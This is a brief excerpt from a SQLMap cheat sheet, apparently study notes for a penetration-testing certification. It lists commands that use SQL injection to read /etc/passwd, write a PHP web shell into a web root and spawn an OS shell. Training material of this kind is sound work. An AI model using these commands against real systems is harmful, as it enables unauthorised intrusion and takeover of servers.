powenn/HTB-CPTS/CheatSheet/SQLMap.md

 | `sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"` | Reading a local file                                        |
 | `sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"` | Writing a file                                              |
 | `sqlmap -u "http://www.example.com/?id=1" --os-shell`        | Spawning an OS shell                                        |

+> similarly to the case with the '--data' option, within the saved request file, we can specify the parameter we want to inject in with an asterisk (*), such as `'/?id=*'`.